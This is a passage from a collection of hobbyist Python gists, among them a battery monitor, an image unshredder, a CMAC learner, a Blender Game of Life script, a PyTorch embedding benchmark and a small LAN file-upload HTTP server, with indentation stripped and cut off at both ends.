print 'theta: %s' % theta
plotDecisionBoundary(theta, X, y)
plt.show()
raw_input('Press any key to continue\n')
# ============== Part 4: Predict and Accuracies
prob = sigmoid(mat('1 45 85') * c_[theta])
print 'For a student with scores 45 and 85, we predict an admission ' \
'probability of %f' % prob
p = predict(theta, X)
print 'Train Accuracy:', (p == y).mean() * 100
raw_input('Press any key to continue\n')
```
#### File: hard-gists/16c0eb09d232461a773c22803a3df35e/snippet.py
```python
from gi.repository import Notify
import subprocess
from time import sleep, time
from sys import argv
import dbus
def send_notification(title, text):
try:
if Notify.init(argv[0]):
n = Notify.Notification.new("Notify")
n.update(title, text)
n.set_urgency(2)
if not n.show():
raise SyntaxError("sending notification failed!")
else:
raise SyntaxError("can't initialize notification!")
except SyntaxError as error:
print(error)
if error == "sending notification failed!":
Notify.uninit()
else:
Notify.uninit()
def run_cmd(cmdlist):
try:
stdout = subprocess.check_output(cmdlist)
except subprocess.CalledProcessError:
pass
else:
if stdout:
return stdout
def run_dbus_method(bus_type, obj, path, interface, method, arg):
if bus_type == "session":
bus = dbus.SessionBus()
if bus_type == "system":
bus = dbus.SystemBus()
proxy = bus.get_object(obj, path)
method = proxy.get_dbus_method(method, interface)
if arg:
return method(arg)
else:
return method()
def suspend_system():
run_dbus_method('session',
'com.canonical.Unity',
'/com/canonical/Unity/Session',
'com.canonical.Unity.Session',
'Suspend', 'None')
def get_battery_percentage():
output = run_cmd(['upower', '--dump']).decode().split('\n')
found_battery = False
for line in output:
if 'BAT' in line:
found_battery = True
if found_battery and 'percentage' in line:
return line.split()[1].split('%')[0]
def main():
end = time()
battery_path = ""
for line in run_cmd(['upower', '-e']).decode().split('\n'):
if 'battery_BAT' in line:
battery_path = line
break
while True:
notified = False
while subprocess.call(['on_ac_power']) == 0:
sleep(0.25)
run_dbus_method('system', 'org.freedesktop.UPower',
battery_path, 'org.freedesktop.UPower.Device',
'Refresh', 'None')
battery_percentage = int(get_battery_percentage())
if battery_percentage == int(argv[2]) and not notified:
subprocess.call( ['zenity', '--info','--text', 'Battery reached' + argv[2] + '%' ] )
notified = True
while subprocess.call(['on_ac_power']) == 1:
sleep(0.25)
run_dbus_method('system', 'org.freedesktop.UPower',
battery_path, 'org.freedesktop.UPower.Device',
'Refresh', 'None')
battery_percentage = int(get_battery_percentage())
if battery_percentage <= int(argv[1]):
if battery_percentage <= 10:
send_notification('Low Battery',
'Will suspend in 60 seconds')
sleep(60)
suspend_system()
continue
if end < time():
end = time() + 600
send_notification('Low Battery', 'Plug in your charger')
if __name__ == '__main__':
main()
```
#### File: hard-gists/1773870/snippet.py
```python
import wave
import numpy
import struct
import sys
import csv
from scikits.samplerate import resample
def write_wav(data, filename, framerate, amplitude):
wavfile = wave.open(filename, "w")
nchannels = 1
sampwidth = 2
framerate = framerate
nframes = len(data)
comptype = "NONE"
compname = "not compressed"
wavfile.setparams((nchannels,
sampwidth,
framerate,
nframes,
comptype,
compname))
print("Please be patient whilst the file is written")
frames = []
for s in data:
mul = int(s * amplitude)
# print "s: %f mul: %d" % (s, mul)
frames.append(struct.pack('h', mul))
# frames = (struct.pack('h', int(s*self.amp)) for s in sine_list)
frames = ''.join(frames)
for x in xrange(0, 7200):
wavfile.writeframes(frames)
wavfile.close()
print("%s written" %(filename))
if __name__ == "__main__":
if len(sys.argv) <= 1:
print "You must supply a filename to generate"
exit(-1)
for fname in sys.argv[1:]:
data = []
for time, value in csv.reader(open(fname, 'U'), delimiter=','):
try:
data.append(float(value))
except ValueError:
pass # Just skip it
print "Generating wave file from %d samples" % (len(data),)
arr = numpy.array(data)
# Normalize data
arr /= numpy.max(numpy.abs(data))
filename_head, extension = fname.rsplit(".", 1)
# Resample normalized data to 44.1 kHz
target_samplerate = 44100
sampled = resample(arr, target_samplerate/100000.0, 'sinc_best')
write_wav(sampled, filename_head + ".wav", 100000, 32700)
```
#### File: hard-gists/1788517/snippet.py
```python
from PIL import Image, ImageChops, ImageStat
from argparse import ArgumentParser
import sys, heapq
MAGIC_THRESHOLD = 11 # carefully handpicked to work with your reference input
# calculate per-channel image difference and binarize the result, returns image
def image_diff(edge1, edge2):
diff = ImageChops.difference(edge1, edge2) # abs(edge1-edge2)
return Image.eval(diff, lambda i: i>MAGIC_THRESHOLD and 1) # binarize
# heuristics based on aggregate per-pixel difference; returns score (larger score = more differences)
def edge_score(edge1, edge2):
edge_sum_rgb = ImageStat.Stat(image_diff(edge1, edge2)).sum
return sum(edge_sum_rgb) # R+G+B
# vertical blur (5px mean, used for filtering out high frequencies)
def vblur(image):
const_ = Image.new(image.mode, image.size)
o = (ImageChops.add(ImageChops.offset(image, 0, d), const_, scale=5) for d in range(-2, 3))
return reduce(ImageChops.add, o)
# unshred an image given known column width; returns iterable of column indices
def find_sequence(image, col_width):
width, height = image.size;
cols = width / col_width
# extract edges (1px strip from left & right side of each column)
left_edges = []
right_edges = []
for i in range(cols):
left_edges+=vblur(image.crop((i*col_width, 0, i*col_width+1, height))),
right_edges+=vblur(image.crop(((i+1)*col_width-1, 0, (i+1)*col_width, height))),
# precalc fitness scores for each column pair
scores = []
for i in range(cols):
row = []
for j in range(cols):
if i == j:
row += sys.maxint, # forget about i==j cases
continue
row += edge_score(left_edges[i], right_edges[j]),
scores += row,
# find the best column to start reconstruction from
best_starter = -1
bst_left_score = bst_right_score = sys.maxint
for i in range(cols):
loc_best_l = min(scores[i])
loc_best_r = min(scores[j][i] for j in range(cols))
if loc_best_l < bst_left_score and loc_best_r < bst_right_score:
bst_left_score = loc_best_l
bst_right_score = loc_best_r
best_starter = i
remain = range(cols)
remain.remove(best_starter)
result = [best_starter,]
# rebuild the rest of the f-ng owl
while remain:
#uncomment to dump step by step vis to files:
#reorder_shreds(image, result, col_width).save('%d.jpg'%len(result))
left = result[0]
right = result[-1]
left_score, left_idx = min((scores[left][rem_i], rem_i) for rem_i in remain)
right_score, right_idx = min((scores[rem_i][right], rem_i) for rem_i in remain)
if left_score < right_score:
# put left
remain.remove(left_idx)
result.insert(0, left_idx)
else:
# put right
remain.remove(right_idx)
result.append(right_idx)
return result
# reorder columns /given sequence; returns new image
def reorder_shreds(image, new_order, col_width = None):
result = Image.new(image.mode, image.size)
width,height = image.size
if not col_width: col_width = width/len(new_order)
for i,j in enumerate(new_order):
col = image.crop((j*col_width, 0, (j+1)*col_width, height))
result.paste(col, (i*col_width, 0))
return result
MAGIC_LINES_TO_CONSIDER = 5
# heuristics based on longest continuous diff (similar to edge_score, but used for autodetection)
def edge_line_score(l1, l2):
e = image_diff(l1, l2)
w,h = e.size
d = e.getdata()
counter = 0
lines = []
for v in d:
if sum(v) == 0:
if counter != 0:
heapq.heappush(lines, counter)
counter = 0
continue
counter+=1
return sum(heapq.nlargest(MAGIC_LINES_TO_CONSIDER, lines))
# autodetects column width, returns positive integer (pixels) or 0 if failed
def detect_shred_width(image):
width,height = image.size
possible_col_no = filter(lambda x: 0==width%x, range(4, width/4+1))
# estimates score for col. number hypothesis, higher score = more likely
def calc_score(cols):
col_width = width/cols
def line_score(x):
l1 = image.crop((x, 0, x+1, height))
l2 = image.crop((x-1, 0, x, height))
return edge_line_score(l1, l2)
l_scores = []
for i in range(1, cols):
pre_l, l, post_l = (line_score(col_width*i+d) for d in range(-1, 2))
l_scores += l-(pre_l+post_l),
return float(sum(l_scores)) / (cols-1)
# estimate score for all legit col numbers
scores = map(calc_score, possible_col_no)
# if the actual strip width is 32px, then 64, 128 and 256 will most probably
# get good score as well (same for 5, 10, 20, 40, etc)
# the following section tries to solve this by looking for the biggest
# column number with a (relatively) good score
best_guess = 1
best_score = 0
for score, guess in sorted(zip(scores, possible_col_no), reverse=True):
if score <= 0: continue
if guess > best_guess:
times = guess/best_guess
if score * times > best_score:
best_guess = guess
best_score = score
if best_score == 0:
return 0
return width/best_guess
# read file, autodetect width if needed, unshred, save
def unshred(in_filename, out_filename, shred_width = None):
image = Image.open(in_filename)
if not shred_width:
shred_width = detect_shred_width(image)
if not shred_width:
print "Autodetection failed, try -w flag"
return
print "Autodetected strip width %dpx" % shred_width
print "Unshredding..."
sequence = find_sequence(image, shred_width)
reorder_shreds(image, sequence).save(out_filename)
print "Done => %s" % out_filename
# parse command line args
def main():
parser = ArgumentParser(description="Unshred a shredded image")
parser.add_argument('input_image')
parser.add_argument('output_image')
parser.add_argument('--strip_width', '-w', help="force strip width W px. (disables autodetect)", type=int, default=0)
args = parser.parse_args()
unshred(args.input_image, args.output_image, args.strip_width)
if __name__ == "__main__":
main()
```
#### File: hard-gists/1792732/snippet.py
```python
import os, sys, getopt, pdb
from numpy import *
from numpy.random import *
import pylab
from mpl_toolkits.mplot3d import Axes3D
import pickle
pylab.ioff()
class CMAC(object):
def __init__(self, nlevels, quantization, beta):
self.nlevels = nlevels
self.quantization = quantization
self.weights = {}
self.beta = beta
def save(self,filename):
pickle.dump(self,open(filename,'wb'),pickle.HIGHEST_PROTOCAL)
def quantize(self, vector):
"""
Generate receptive field coordinates for each level of the CMAC.
"""
quantized = (vector / self.quantization).astype(int)
coords = []
for i in range(self.nlevels):
# Note that the tile size is nlevels * quantization!
# Coordinates for this tile.
point = list(quantized - (quantized - i) % self.nlevels)
# Label the ith tile so that it gets hashed uniquely.
point.append(i)
coords.append(tuple(point))
return coords
def difference(self, vector, delta, quantized = False):
"""
Train the CMAC using the difference instead of the response.
"""
# Coordinates for each level tiling.
coords = None
if quantized == False:
coords = self.quantize(vector)
else:
coords = vector
error = self.beta * delta # delta = response - prediction
for pt in coords:
self.weights[pt] += error
return delta
def response(self, vector, response, quantized = False):
"""
Train the CMAC.
"""
# Coordinates for each level tiling.
coords = None
if quantized == False:
coords = self.quantize(vector)
else:
coords = vector
# Use Python's own hashing for storing feature weights. If you
# roll your own you'll have to learn about Universal Hashing.
prediction = sum([self.weights.setdefault(pt, 0.0) for pt in coords]) / len(coords)
error = self.beta * (response - prediction)
for pt in coords:
self.weights[pt] += error
return prediction
def __len__(self):
return len(self.weights)
def eval(self, vector, quantized = False):
"""
Eval the CMAC.
"""
# Coordinates for each level tiling.
coords = None
if quantized == False:
coords = self.quantize(vector)
else:
coords = vector
return sum([self.weights.setdefault(pt, 0.0) for pt in coords]) / len(coords)
def test(name):
if name == 'sin':
cmac = CMAC(32, .01, 0.1)
points = uniform(low=0,high=2*pi,size=1000)
responses = sin(points)
errors = []
for (point,response) in zip(points,response):
predicted = cmac.response(array([point]),response)
errors.append(abs(response - predicted))
#print point, response, predicted
points = uniform(low=0, high=2*pi, size=100)
actual = []
for point in points:
actual.append(cmac.eval(array([point])))
pylab.figure(1)
pylab.plot(points,actual, '.')
pylab.figure(2)
pylab.plot(errors)
pylab.show()
elif name == 'wave':
cmac = CMAC(32, .1, 0.01)
points = uniform(low=0,high=2*pi,size=(10000,2))
responses = sin(points[:,0]) + cos(points[:,1])
errors = []
for (point,response) in zip(points,responses):
predicted = cmac.response(point,response)
errors.append(abs(response - predicted))
#print point, response, predicted
fig1 = pylab.figure(1)
#ax1 = fig1.add_subplot(111,projection='3d')
ax1 = Axes3D(fig1)
ax1.scatter(points[:,0], points[:,1], responses)
points = uniform(low=0,high=2*pi,size=(10000,2))
predictions = []
for point in points:
predictions.append(cmac.eval(point))
fig2 = pylab.figure(2)
#ax2 = fig2.add_subplot(111,projection='3d')
ax2 = Axes3D(fig2)
ax2.scatter(points[:,0], points[:,1], predictions)
# print len(cmac)
# pylab.plot(errors)
pylab.show()
def main():
def usage():
print sys.argv[0] + "[-h] [-d]"
try:
(options, args) = getopt.getopt(sys.argv[1:], 'dh', ['help','debug'])
except getopt.GetoptError:
# print help information and exit:
usage()
sys.exit(2)
for o, a in options:
if o in ('-h', '--help'):
usage()
sys.exit()
elif o in ('-d', '--debug'):
pdb.set_trace()
test('wave')
if __name__ == "__main__":
main()
```
#### File: hard-gists/1820829/snippet.py
```python
import os
import web
from jinja2 import Environment,FileSystemLoader
# Router
urls = (
"/.*", "hello",
'/contact', 'rsvp'
)
app = web.application(urls, globals())
# Define template rendering with jinja2 without overriding native render
def render_template(template_name, **context):
extensions = context.pop('extensions', [])
globals = context.pop('globals', {})
jinja_env = Environment(
loader=FileSystemLoader(os.path.join(os.path.dirname(__file__), 'templates')),
extensions=extensions,
)
jinja_env.globals.update(globals)
return jinja_env.get_template(template_name).render(context)
# Controller
class hello:
def GET(self):
return render_template('index.html')
class rsvp:
def GET(self):
pass
if __name__ == "__main__":
app.run()
```
#### File: hard-gists/1823320/snippet.py
```python
from registration.signals import user_activated
from django.contrib.auth import login, authenticate
def login_on_activation(sender, user, request, **kwargs):
"""Logs in the user after activation"""
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
# Registers the function with the django-registration user_activated signal
user_activated.connect(login_on_activation)
```
#### File: hard-gists/1928063/snippet.py
```python
from django import template
register = template.Library()
@register.tag
def capture(parser, token):
nodelist = parser.parse(('endcapture',))
parser.delete_first_token()
varname = token.contents.split()[1]
return CaptureNode(nodelist, varname)
class CaptureNode(template.Node):
def __init__(self, nodelist, varname):
self.nodelist = nodelist
self.varname = varname
def render(self, context):
context[self.varname] = self.nodelist.render(context)
return ''
```
#### File: hard-gists/19284bd220165758a0c953ae25108b6b/snippet.py
```python
import bpy
import sys
from mathutils import Vector
import numpy as np
class ConwayGOL_2D:
def __init__(self, N):
"""
2D Conway Game of Life
:param N: grid side size (resulting grid will be a NxN matrix)
"""
self.N = N
self.grid = np.random.choice(2, (N,N))
def update(self):
"""
Update status of the grid
"""
tmpGrid = self.grid.copy()
for i in range(self.N):
for j in range(self.N):
neighbours = self.grid[max(0, i-1):min(i+2,self.N),max(0, j-1):min(j+2,self.N)].sum()
neighbours -= self.grid[i, j]
if self.grid[i, j] == 1:
if neighbours > 3 or neighbours < 2:
tmpGrid[i, j] = 0
elif neighbours == 3:
tmpGrid[i, j] = 1
self.grid = tmpGrid
#######################################
# GENERATORS #
#######################################
# generate and add an object with given properties to the scene
def suzanne_generator(size, x, y, z):
bpy.ops.mesh.primitive_monkey_add(
radius = size,
location = (x*2, y*2, z))
def cube_generator(cube_side, x, y, z):
bpy.ops.mesh.primitive_cube_add(
radius = cube_side,
location = (x*2, y*2, z))
def icosphere_generator(size, subdivisions, x, y, z):
bpy.ops.mesh.primitive_ico_sphere_add(
subdivisions = subdivisions,
size = size,
location = (x*2, y*2, z))
#######################################
# UPDATERS #
#######################################
# define behavior for a Blender object based on gol grid value
# Hides object (both view and render)
def object_updater_hide(obj, grid_val, keyframe=True):
obj.hide = not grid_val
obj.hide_render = obj.hide
if keyframe:
obj.keyframe_insert("hide")
obj.keyframe_insert("hide_render")
# shrink object when grid values is zero
def object_updater_scale(obj, grid_val, scale_factor=0.8, keyframe=True):
origin_scale = Vector((1.0, 1.0, 1.0))
# grid value 1, object should end up with original size
if grid_val:
# skip all (keyframing too) if already ok, otherwise set original size
if obj.scale == origin_scale:
return
else:
obj.scale = origin_scale
# grid value 0, object should end up scaled
else:
# skip all (keyframing too) if already ok, otherwise set scaled size
if obj.scale == origin_scale*scale_factor:
return
else:
obj.scale = origin_scale*scale_factor
if keyframe:
obj.keyframe_insert("scale")
#######################################
# UTIL METHODS #
#######################################
# create grid of objects on current scene
# The object generator is responsible for the creation of a single object instance
def create_grid(gol, obj_generator):
obj_grid = []
for i in range(gol.N):
row = []
for j in range(gol.N):
obj_generator(i, j, 0)
row.append(bpy.context.scene.objects.active)
obj_grid.append(row)
return obj_grid
# update grid of Blender objects to reflect gol status, then update gol.
def update_grid(obj_grid, gol, obj_updater):
for i in range(gol.N):
for j in range(gol.N):
obj_updater(obj_grid[i][j], gol.grid[i, j])
gol.update()
# handler called at every frame change
def frame_handler(scene, grid, gol, obj_updater, num_frames_change):
frame = scene.frame_current
n = frame % num_frames_change
if n == 0:
update_grid(grid, gol, obj_updater)
# delete all objects of current scene (un-hide all hidden ones first)
def delete_all():
for obj in bpy.data.objects:
obj.hide = False
# select/delete only meshes
obj.select = obj.type == 'MESH'
bpy.ops.object.delete(use_global=True)
def main(_):
num_frames_change = 2
grid_side = 5
obj_size = 0.7
subdivisions = 10
scale_factor=0.2
#obj_generator = lambda x,y,z:icosphere_generator(obj_size, subdivisions, x, y, z)
obj_generator = lambda x,y,z:cube_generator(obj_size, x, y, z)
#obj_updater = object_updater_hide
obj_updater = lambda obj,grid:object_updater_scale(obj,grid, scale_factor=scale_factor)
delete_all()
gol = ConwayGOL_2D(grid_side)
obj_grid = create_grid(gol, obj_generator)
bpy.app.handlers.frame_change_pre.clear()
bpy.app.handlers.frame_change_pre.append(lambda x : frame_handler(x, obj_grid, gol,
obj_updater,
num_frames_change))
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: hard-gists/19a4b105d1dff9a591b8/snippet.py
```python
import execjs
import os
here = os.path.dirname(__file__)
node_modules = os.path.abspath(os.path.join(here, './node_modules'))
class Babel:
def __init__(self, *module_paths):
"""Constructor
:param module_paths: Paths to node_modules
"""
self.paths = module_paths
# This is used to let execjs know where the
# modules are
self.module_append_string = '\n'.join(
'module.paths.push("%s")\n' % p for p in self.paths
)
command_string = 'var babel = require("babel-core")'
self.babel = execjs.compile(self.module_append_string + command_string)
def transpile(self, code, options=None):
"""Takes code and runs it through babel.js
if ``options`` is not provided it'll default to:
.. code-block:: python
{'ast': false, 'presets': ['react', 'es2015']}
"""
if options is None:
options = {
'ast': False,
'presets': ['react', 'es2015'],
}
transpiled_code = self.babel.call(
'babel.transform', code, options
)['code']
return transpiled_code
class React:
def __init__(self, babel):
"""Constructor
:param babel: Instance of ``babel``.
"""
self.babel = babel
self.codes = []
def add_code(self, code):
"""Registers some code to be included
This registers a class to be included in the rendering context.
"""
self.codes.append(code)
def render_string(self, code):
"""Renders a string of JSX
This will take a JSX string and render it to HTML
"""
classes = '\n'.join(
'{0};'.format(code) for code in self.codes
)
# we don't use `es2015` preset here because it
# forces `use strict`
element_options = {'ast': False, 'presets': ['react']}
element = self.babel.transpile(code, element_options)
es6_code = """
import ReactDOMServer from "react-dom/server";
{0}
function __render() {{
var element = {1}
return ReactDOMServer.renderToString(element);
}};""".format(classes, element);
transpiled = self.babel.transpile(es6_code)
final_code = self.babel.module_append_string + transpiled
compiled = execjs.compile(final_code)
result = compiled.call('__render')
return result
babel = Babel(node_modules)
react = React(babel)
original_source = """
import React from "react";
class HelloWorld extends React.Component {
render() {
return <p>Hello, world!</p>;
}
}
"""
react.add_code(original_source)
print(react.render_string("<HelloWorld />"))
```
#### File: hard-gists/19d2397ff8da1952556cf2417d965f6c/snippet.py
```python
def make_monitor(running_mean_len):
def monitor(i,self,args):
if np.mean(self.oob_improvement_[max(0,i-running_mean_len+1):i+1])<0:
return True
else:
return False
return monitor
## Example use
from sklearn.ensemble import GradientBoostingRegressor
gbr = GradientBoostingRegressor(n_estimators=10000000,verbose=5) ## n_estimators can be arbitrarily high
monitor = make_monitor(10) ## this is a number that should be fit to a validation set
gbr.fit(X_train,y_train,monitor=monitor)
print gbr.estimators_.shape[0]
```
#### File: hard-gists/1cec2b3d8aeaaa102e3b/snippet.py
```python
import gtk, gobject
from subprocess import Popen
VOL_UP = 'amixer set Master 5%+' # command to set up
VOL_DOWN = 'amixer set Master 5%-' # command to set down
class SystrayIconApp:
def __init__(self):
self.tray = gtk.status_icon_new_from_icon_name('audio-volume-medium')
self.tray.connect('scroll-event', self.on_scroll)
self.tray.set_tooltip(('Volume tray app'))
def on_scroll(self, icon, event):
if event.direction == gtk.gdk.SCROLL_UP:
Popen(VOL_UP.split(' '))
else:
Popen(VOL_DOWN.split(' '))
if __name__ == "__main__":
SystrayIconApp()
gtk.main()
```
#### File: hard-gists/1d7cb531bb8fff8c228b7710126bcc33/snippet.py
```python
import yaml
import sys
import json
import argparse
from subprocess import Popen, PIPE
import argparse
import os
exists=os.path.isfile
def json_serial(obj):
# all obj's dumped to str
return str(obj)
# look for jq arguments, vs file arguments
offset=1
for arg in sys.argv[1:]:
if arg and arg[0] == '-' and not exists(arg):
++offset
else:
break
# construct arguments so that it looks like jq
files=[]
frm=[0]
index=offset
for arg in sys.argv[offset:]:
if exists(arg):
files.append(arg)
frm.insert(0,index)
index+=1
for index in frm:
sys.argv.pop(index)
if sys.argv:
# jq args are present
args=["jq"]+sys.argv
pipe = Popen(args, stdin=PIPE).stdin
else:
# no jq args... just dump to stdout
pipe = sys.stdout
if files:
for fin in files:
json.dump(yaml.load(open(fin)),pipe,default=json_serial)
else:
json.dump(yaml.load(sys.stdin),pipe,default=json_serial)
```
#### File: hard-gists/1e7c18c6f6eda87f1cb4995b0e6a22a5/snippet.py
```python
import argparse
from collections import Counter
import csv
import os
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as data
import tarfile
import time
import urllib.request
'''
This trains a classifier using Embedding -> tanh -> Linear -> CrossEntropyLoss
The goal is really just to get a sense of the speed of the Embedding layer in various cases,
there's not even any evaluation of the model :) (would be easy to add though)
$ python demo.py
$ python demo.py --sparse
$ python demo.py --cuda
$ python demo.py --cuda --sparse
'''
parser = argparse.ArgumentParser()
parser.add_argument('--cuda', action='store_true', help='use CUDA')
parser.add_argument('--sparse', action='store_true', help='use sparse updates for embedding layer')
parser.add_argument('--nepochs', type=int, default=10, help='number of epochs')
parser.add_argument('--ntoken', type=int, default=1000000, help='maximum dictionary size')
parser.add_argument('--nhid', type=int, default=100, help='hidden layer size')
parser.add_argument('--batch-size', type=int, default=100, help='batch size')
opt = parser.parse_args()
nclasses = 14
url = 'https://github.com/le-scientifique/torchDatasets/raw/master/dbpedia_csv.tar.gz'
base_folder = '/tmp'
archive_folder = os.path.join(base_folder, 'dbpedia_csv')
train_file = os.path.join(archive_folder, 'train.csv')
test_file = os.path.join(archive_folder, 'test.csv')
Tensor = torch.cuda.FloatTensor if opt.cuda else torch.Tensor
class Dataset(data.Dataset):
def __init__(self, dictionary, filepath):
lengths = []
indices = []
targets = []
with open(filepath, 'r') as fin:
for row in csv.reader(fin):
tokens = [i for i in [dictionary.get(x) for x in (row[1] + row[2]).split()] if i is not None]
length = len(tokens)
targets.append(int(row[0]) - 1)
lengths.append(len(tokens))
indices.extend(tokens)
self.targets = torch.LongTensor(targets)
self.lengths = torch.LongTensor(lengths)
self.starts = self.lengths.cumsum(0) - self.lengths
self.indices = torch.LongTensor(indices)
def __getitem__(self, index):
start = self.starts[index]
length = self.lengths[index]
indices = self.indices[start:start + length] if length > 0 else None
return length, indices, self.targets[index]
def __len__(self):
return self.lengths.numel()
class Model(nn.Module):
def __init__(self, ntoken, nhid, nclasses):
super(Model, self).__init__()
self.embedding = nn.Embedding(opt.ntoken, opt.nhid, sparse=opt.sparse)
self.linear = nn.Linear(opt.nhid, nclasses)
def forward(self, lengths, indices):
embeddings = Variable(Tensor(lengths.numel(), opt.nhid))
starts = lengths.data.cumsum(0) - lengths.data
for i, length in enumerate(lengths.data):
if length > 0:
start = starts[i]
embeddings[i] = self.embedding(indices[start:start + length]).sum(dim=0).squeeze(0) / length
else:
embeddings[i] = torch.zeros(opt.nhid)
return self.linear(embeddings.tanh())
def collate(batch):
lengths = torch.LongTensor([x[0] for x in batch])
indices = torch.cat([x[1] for x in batch if x[1] is not None])
targets = torch.LongTensor([x[2] for x in batch])
return lengths, indices, targets
def load_dictionary(filepath):
cnt = Counter()
with open(filepath, 'r') as fin:
for row in csv.reader(fin):
for token in (row[1] + row[2]).split():
cnt[token] += 1
return {e: i for i, (e, _) in enumerate(cnt.most_common(opt.ntoken))}
print('Downloading dataset')
if not os.path.exists(archive_folder):
with urllib.request.urlopen(url, timeout=15) as stream, \
tarfile.open(fileobj=stream, mode='r|gz') as tf:
tf.extractall(base_folder)
print('Initializing model')
model = Model(opt.ntoken, opt.nhid, nclasses)
if opt.cuda:
model.cuda()
print('Building dictionary')
dictionary = load_dictionary(train_file)
print('Loading dataset')
train_data = Dataset(dictionary, train_file)
train_dataloader = data.DataLoader(train_data, batch_size=opt.batch_size, shuffle=True, collate_fn=collate)
# test_data = Dataset(dictionary, test_file)
# test_dataloader = data.DataLoader(test_data, batch_size=opt.batch_size, collate_fn=collate)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adagrad(model.parameters(), lr=0.1)
start_time = time.time()
total_batches = 0
print('Training')
for i in range(opt.nepochs):
for j, inputs in enumerate(train_dataloader):
optimizer.zero_grad()
lengths, indices, targets = [Variable(x.cuda() if opt.cuda else x) for x in inputs]
probs = model(lengths, indices)
loss = criterion(probs, targets)
loss.backward()
optimizer.step()
total_batches += 1
print('epoch: {}, batches: {}/{}, loss: {}, time/batch: {}'.format(
i + 1, j + 1, len(train_dataloader), loss.data[0], (time.time() - start_time) / total_batches))
```
#### File: hard-gists/1e7e3c1da32d00f8ce0dff6b86fd45fe/snippet.py
```python
import os
import html
import urllib
import sys
import http
import cgi
import socket
import socketserver
import mimetypes
from io import BytesIO
from http import HTTPStatus
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import netifaces as ni
__version__ = "0.8"
class UploadHTTPHandler(SimpleHTTPRequestHandler):
server_version = "SimpleHTTP/" + __version__
def do_POST(self):
"""Serve a POST request."""
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
filename = form['file'].filename
path = self.translate_path(self.path)
filepath = os.path.join(path, filename)
if os.path.exists(filepath):
self.log_error('File %s exist!', filename)
filepath += '.new'
with open(filepath, 'wb') as f:
f.write(form['file'].value)
super().do_GET()
def list_directory(self, path):
try:
list = os.listdir(path)
except OSError:
self.send_error(
HTTPStatus.NOT_FOUND,
"No permission to list directory")
return None
list.sort(key=lambda a: a.lower())
r = []
try:
displaypath = urllib.parse.unquote(self.path,
errors='surrogatepass')
except UnicodeDecodeError:
displaypath = urllib.parse.unquote(path)
displaypath = html.escape(displaypath)
enc = sys.getfilesystemencoding()
title = 'Directory listing for %s' % displaypath
r.append('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">')
r.append('<html>\n<head>')
r.append('<meta http-equiv="Content-Type" '
'content="text/html; charset=%s">' % enc)
r.append('<title>%s</title>\n</head>' % title)
r.append('<body>\n<h1>%s</h1>' % title)
r.append('''<form action="" enctype="multipart/form-data" method="post">\n
<input name="file" type="file" />
<input value="upload" type="submit" />
</form>''')
r.append('<hr>\n<ul>')
for name in list:
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
r.append('<li><a href="%s">%s</a></li>'
% (urllib.parse.quote(linkname,
errors='surrogatepass'),
html.escape(displayname)))
r.append('</ul>\n<hr>\n</body>\n</html>\n')
encoded = '\n'.join(r).encode(enc, 'surrogateescape')
f = BytesIO()
f.write(encoded)
f.seek(0)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html; charset=%s" % enc)
self.send_header("Content-Length", str(len(encoded)))
self.end_headers()
return f
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
extensions_map = mimetypes.types_map.copy()
extensions_map.update({
'': 'application/octet-stream', # Default
'.py': 'text/plain',
'.c': 'text/plain',
'.h': 'text/plain',
})
def get_httpd(port):
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", port), Handler)
return httpd
def get_wirelessip(interf):
try:
wirelessip = ni.ifaddresses(interf)[ni.AF_INET][0]['addr']
except:
wirelessip = get_ip_address()
return wirelessip
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def show_qr(url):
cmd = "echo {} | qrencode -o - -t UTF8".format(url)
os.system(cmd)
if __name__ == '__main__':
#"""with upload
if len(sys.argv) == 3:
webdir=sys.argv[1]
port=int(sys.argv[2])
os.chdir(webdir)
UploadHTTPHandler.protocol_version = "HTTP/1.0"
wirelessip = get_wirelessip("en0")
server_address = (wirelessip, port)
httpd = HTTPServer(server_address, UploadHTTPHandler)
sa = httpd.socket.getsockname()
url = "http://{}:{}".format(sa[0], sa[1])
show_qr(url)
print(" | Serving HTTP on {}".format(url))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nKeyboard interrupt received, exiting.")
httpd.server_close()
sys.exit(0)
else:
print ("Usage:\n\t{} WEB_DIR PORT".format(sys.argv[0]))
"""wo upload
if len(sys.argv) == 3:
WEB_DIR=sys.argv[1]
port=int(sys.argv[2])
os.chdir(WEB_DIR)
wirelessip = get_wirelessip("en0")
httpd = get_httpd(port)
url = "http://{}:{}".format(wirelessip, port)
show_qr(url)
print (" | Serving at {}".format(url))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\n | Keyboard interrupt received, exiting.")
httpd.server_close()
sys.exit(0)
else:
print ("Usage:\n\t{} WEB_DIR PORT".format(sys.argv[0]))
"""
```
#### File: hard-gists/1ed9763ab4aa98516a7d/snippet.py
```python
from optparse import make_option
from django.core import serializers
from django.db.models import get_app, get_models
__author__ = 'mikhailturilin'
from django.core.management.base import BaseCommand
def get_foreign_key_fields(model):
for field in model._meta.fields:
if field.get_internal_type() == "ForeignKey":
yield field
def model_name(model):
return model._meta.object_name
def copy_instance(model, instance, from_database, to_database, ignore_errors=False, natural_key_models=None,
skip_models=None):
if model_name(model) in (skip_models or []):
return
use_natural_keys = model_name(model) in (natural_key_models or [])
if model.objects.using(to_database).filter(pk=instance.pk).exists():
# print "Skipping %s:%s" % (model.__name__, obj.pk)
return
print "Copying %s:%s" % (model.__name__, instance.pk)
# copy foreign keys
for fk_field in get_foreign_key_fields(model):
